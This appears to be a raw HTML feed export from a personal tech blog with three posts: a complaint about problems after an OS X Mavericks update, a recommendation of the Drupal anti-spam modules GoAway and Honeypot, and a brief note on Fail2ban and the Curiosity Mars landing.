about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Thu, 09/15/2016 - 17:20</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/9" hreflang="en">GTOTD</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/10" hreflang="en">fortune-mod</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=7&amp;2=field_comments&amp;3=comment_forum" token="c7RsOYLgrNB1e3nipyth-yLa8cuxahZ814Gu2EDxCUM"></drupal-render-placeholder> </section> Thu, 15 Sep 2016 23:20:59 +0000 AlReaud 7 at http://happycattech.com http://happycattech.com/index.php/book/geek-thought-day-archive#comments Free Maverick update NOT recommended... http://happycattech.com/index.php/maverick-update-not-recommended <span class="field field--name-title field--type-string field--label-hidden">Free Maverick update NOT recommended...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Recently, I had the dubious pleasure of updating a friend's MacBook for OS X 10.6.8 to 10.9. It started as normal, with a backup to DVD of all data that my friend couldn't afford to loose, such as pictures, documents, etc. Normal SOP for significant OS updates.</p> <p>After that, the update was started. First off, we had to figure out what the Apple ID and password were. That took a bit of time, but we finally found the piece of paper with the critical information. Once we started the update the real fun started. First off, we only had a 500KBS connection. That translates out to an approximately 3 hour download. <u>You get what you pay for</u>, LOL. The reason for doing this update was that my friend needed the speech to text capability that is now part of Maverick. A bit on that later, as all was not what it seems with that application.</p> <p>So the update downloaded, and the MacBook updated to OS X 10.9, after more post-update updates. Maverick, BTW, has a definition as an adjective of "unorthodox". There were nothing but problems<!--break--> after the update. The most notable one was that applications no longer worked. Applications such as Skype, which are critical for home businesses. Following the Skype install directions, verbatim, resulted in a window that said the application was installed incorrectly. Secondly, Safari lost it's information, so that, as example, if you had Netflix, you no longer were able to log into the service afterwards, and had to go find your login information from, hopefully, notes you took. Then there was a disturbing blanking of the screen that occurred when one started or closed applications. A more subtle but operationally critical problem that really gives you pause is that the router that worked perfectly previous to the update no longer worked correctly after the update. The router in question is D-Link DIR-615. It works perfectly with other non-Apple products, but not with an iPad (<em>not consistently</em>), or with the MacBook after upgrading to OS X 10.9. What works correctly now? An Ethernet cable, or an Apple Airport. Really?</p> <p>The final result of all this was that my friend had to take the MacBook to the MacShack to get MacLove given to it (<em>such as a down-rev Skype application</em>). They did get the MacBook post-update fixed, at least to the point were Skype installed and worked correctly. There was a spiel about the hard drive possibly being bad, but the hard drive was FINE prior to the update to Maverick. It wound up testing OK, BTW.</p> <p>Has Apple <u><em><strong>lost</strong></em></u> it's collective mind? A free update that causes a trip to the MacShack? You've got to be kidding us… No wonder it's a free update. Nobody would pay for it, LOL, they would be asking for their money back if they did, at minimum. A note on the Dictation application, that started this update process. What Apple fails to advertise is that it is <em>cloud</em> software, not an application that is installed on your MacBook. To me, that seems a little bit on the snaky side. My opinion on all of this is that with the passing of Stephen, Apple assumed the business paradigms of Microsoft. God help all Apple customers if that is the case. And Praise the Lord for Linux in all of it's versions.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sat, 11/09/2013 - 21:09</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/77" hreflang="en">Apple</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/78" hreflang="en">OS-X</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/79" hreflang="en">Maverick</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/80" hreflang="en">Update</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=51&amp;2=field_comments&amp;3=comment_forum" token="5NKJcmcW25R--7_gPcMfFlyl66WHoO4Kc1cUCxHp8C0"></drupal-render-placeholder> </section> Sun, 10 Nov 2013 04:09:16 +0000 AlReaud 51 at http://happycattech.com http://happycattech.com/index.php/maverick-update-not-recommended#comments Two great DRUPAL modules to stop harassing spammers http://happycattech.com/index.php/drupal-tips-and-tricks/modules-stop-spammers <span class="field field--name-title field--type-string field--label-hidden">Two great DRUPAL modules to stop harassing spammers</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><span class="royal">Updated: 10/10/2016</span></p> <p>If you operate a content management systems (CMS), you're probably familiar with the curse of botnet attacks on the user registration and persistent spammers on comments. These are IP address that are attached to your CMS from China, i.e. the <a href="http://www.163.com/" target="_blank">163.com</a> domain, sending regular, daily spam message updates about Viagra, Cialis, and faux haute couture, sometimes for years on end. Or they continuously try to attack the user registration CAPTCHA, trying to create accounts to do the same or worse, sometimes using inane responses to the CAPTCHA like "<span style="color:#8b4513;"><em>TooBad1</em></span>" through "<span style="color:#8b4513;"><em>TooBad257</em></span>", not really doing any damage but consuming sometimes scarce resources and filling up the logs (<em>to mask other activity sometimes, like database attacks</em>).</p> <p>This is not a problem specific to any one CMS, and will happen to Drupal, Wordpress, or Joomla. Drupal, however, logs the events as part of core functionality, allowing them to be noticed by the operator. Having dealt with it for well over a year, mostly manually, I found two great modules in the Dupal repository<!--break--> to help curtail the intrusions and the waste of your time as operator. In my case <a href="http://en.wikipedia.org/wiki/Bastard_Operator_From_Hell" target="_blank">BOFH</a>… <img alt="wink" height="23" src="/libraries/smiley/images/wink_smile.png" title="wink" width="23" /></p> <p><strong>GoAway (<span class="warning">currently Drupal 7 only</span>)</strong></p> <blockquote> <p><a href="https://www.drupal.org/project/goaway" target="_blank">https://www.drupal.org/project/goaway</a><br /> Allows for IP banning from the spam comment view, with the miscreant IP forwarded to the URL of your choice. I've not fully experimented with the extent of the banning, however, I don't believe it's as extensive as the Add Rule ban, which is total. This should be reserved for those recursive spammers who just insist on sending you info on how to enlarge your manliness, etc…</p> </blockquote> <p><strong>Honeypot</strong></p> <blockquote> <p><a href="https://www.drupal.org/project/honeypot" target="_blank">https://www.drupal.org/project/honeypot</a><br /> Uses <a href="http://www.sans.org/reading_room/whitepapers/detection/fundamental-honeypotting_2054" target="_blank">honeypotting (PDF whitepaper)</a> techniques to help prevent intrusion by botnets on comment, content, and user registration/password reset forms. This module will not stop intrusion attempts, however it will make them less effective and more cumbersome. It has good control and decreases faux comment and faux user registrations significantly on sites that have those enabled. On this site it's used for comments only, as user registration is disabled. Visitors can bang away at user registration and get access denied every time.</p> </blockquote> <p>The implementation of both the above, along with <a href="https://www.drupal.org/project/captcha" target="_blank">text and image CAPTCHA</a> and/or <a href="https://www.drupal.org/project/recaptcha" target="_blank">reCAPTCHA</a> have allowed opening up sites to anonymous commenting while retaining tight control on user registration and authenticated user access. Well worth checking their applicability for your Drupal site if you're having the spam/fake account problem.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 03/26/2013 - 21:17</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/34" hreflang="en">Drupal</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/35" hreflang="en">Tips</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/39" hreflang="en">Module</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/41" hreflang="en">Spam Control</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=28&amp;2=field_comments&amp;3=comment_forum" token="mWqRMu4dSu1wAgsh9k9eFnWYz2yAv_znXY-v3k2tMLU"></drupal-render-placeholder> </section> Wed, 27 Mar 2013 03:17:57 +0000 AlReaud 28 at http://happycattech.com http://happycattech.com/index.php/drupal-tips-and-tricks/modules-stop-spammers#comments Out of Lurking for Curiosity http://happycattech.com/index.php/out-of-lurking-for-curiosity-lander <span class="field field--name-title field--type-string field--label-hidden">Out of Lurking for Curiosity</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Months go by and nothing gets written because not much changes. The Gnome 3 interface doesn't lock up as much on restart, but normally does so on logout. The attacks on the shell are futile, and <a href="http://www.fail2ban.org/wiki/index.php/Main_Page" target="_blank">Fail2ban</a> does a good job of making them futile. So there's not much to write about.</p> <p>Curiosity, the <a href="http://mars.jpl.nasa.gov/msl/" target="_blank">Mars Science Lander</a>(MSL), is another story. At ~900kg, it's a behemoth, the biggest lander placed on another planet successfully. The <a href="http://mars.jpl.nasa.gov/msl/multimedia/interactives/edlcuriosity/index-2.html" target="_blank">landing techniques</a> were novel, requiring aerobreaking, supersonic parachuting, retrorockets and finally a sky-crane winch-down of the lander itself. Pretty phenomenal...</p> <p>What will we find there, with a real lander that is more like a nuclear powered 6-wheel ATV? There is no telling, but we await expectantly! So congratulations to NASA at the MSL team, great job done getting us there. Now the task is finding out where the water went.<!--break--></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 08/07/2012 - 21:12</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/82" hreflang="en">Mars</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/83" hreflang="en">Curisoity</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/84" hreflang="en">Lander</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/85" hreflang="en">Lurking</a></div> </div> </div> <section> <h2>Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=53&amp;2=field_comments&amp;3=comment_forum" token="u63h0fJQ2aAC-DSpNtzVBRIvsipYWG1DIlFwojZziV8"></drupal-render-placeholder> </section> Wed, 08 Aug 2012 03:12:24 +0000 AlReaud 53 at http://happycattech.com http://happycattech.com/index.php/out-of-lurking-for-curiosity-lander#comments